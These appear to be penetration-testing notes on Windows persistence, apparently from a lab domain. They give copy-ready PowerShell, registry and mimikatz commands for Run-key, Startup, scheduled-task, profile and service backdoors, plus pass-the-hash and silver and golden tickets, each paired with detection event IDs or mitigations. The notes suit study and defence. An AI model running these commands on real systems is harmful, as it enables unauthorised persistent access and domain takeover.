Persistence

Resources

https://rastamouse.me/2018/03/a-view-of-persistence/


Userland & Elevated

# Userland techniques

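# HKCU
# Create a REG_SZ value in the Run key under HKCU\Software\Microsoft\Windows\CurrentVersion. (Other autorun keys are available.)
# Detection: Run-key entries are listed by Sysinternals Autoruns, and value writes appear as Sysmon event ID 13 (registry value set) when registry monitoring is configured.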
Value name:  Backdoor
Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe

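# Start-up
# Create a batch script in the user's Startup folder; everything in that folder is launched when the user logs on.
# Detection: Sysinternals Autoruns lists the folder's contents, and new files there appear as Sysmon event ID 11 (file create) when file monitoring covers the path.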
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe

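# Scheduled Tasks
# Register a task that runs when the user logs on.
# Detection: task registration is logged as Security event 4698 (when "Audit Other Object Access Events" is enabled) and as event 106 in Microsoft-Windows-TaskScheduler/Operational.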
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

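# PowerShell profiles
# You can backdoor the PowerShell profile: the profile script runs each time the user starts a PowerShell session, unless the session is launched with -NoProfile.
# Mitigation: start scripted and administrative sessions with -NoProfile, and monitor the profile paths for unexpected creation or modification.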
PS C:\> Test-Path $profile
False

PS C:\> New-Item -Path $profile -Type File –Force

    Directory: C:\Users\Rasta\Documents\WindowsPowerShell

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       22/03/2018     12:42              0 Microsoft.PowerShell_profile.ps1

PS C:\> $string = 'Start-Process "cmd.exe"'
PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
# Elevated techniques

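# HKLM
# Similar to HKCU: create a REG_SZ value in the Run key under HKLM\Software\Microsoft\Windows\CurrentVersion. Entries here run at logon for every user of the machine.
# Detection: review the key with an autorun enumerator such as Sysinternals Autoruns, and alert on value writes (Sysmon event ID 13).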
Value name:  Backdoor
Value data:  C:\Windows\Temp\backdoor.exe

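# Services
# Create a service that will start automatically or on demand.
# Detection: service installation is logged as System event 7045 (Service Control Manager) and, when audited, Security event 4697. The description is chosen by whoever creates the service, so judge the entry by its binary path (here a Temp directory), not by its name or description.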
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."

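# Scheduled Tasks
# Register a daily task that runs as SYSTEM with the highest run level.
# Detection: Security event 4698 (when audited) and TaskScheduler/Operational event 106 record the registration; a SYSTEM task whose action points into a Temp directory is worth flagging.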
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D


Maintaining Privilege

# Steal passwords and use them with runas
runas /netonly /user:FS01\Administrator cmd
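# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.
# Both domain accounts and local accounts can work.
# Detection: runas /netonly and pass-the-hash both create a logon session that carries new credentials for network use only, recorded on the source host as event 4624 with logon type 9 (NewCredentials).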
mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt
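# Adding a new local user is another way to get back into a machine.
# The local Administrators group is the obvious choice, but membership of the following groups also works:
Remote Desktop Users
Remote Management Users
Backup Operators
# Detection: account creation is logged as Security event 4720 and additions to a local group as event 4732; audit the membership of all four groups, not only Administrators.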
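# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.
# A silver ticket is presented directly to the target service without a request to a domain controller, so evidence is on the target host, not in DC logs. Mitigation: forged tickets stop working once the computer account password is changed.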
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt
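# Golden tickets can be used to forge access to any service in the domain.
# They are signed with the krbtgt account hash, so remediation after a domain compromise includes resetting the krbtgt password twice.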
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt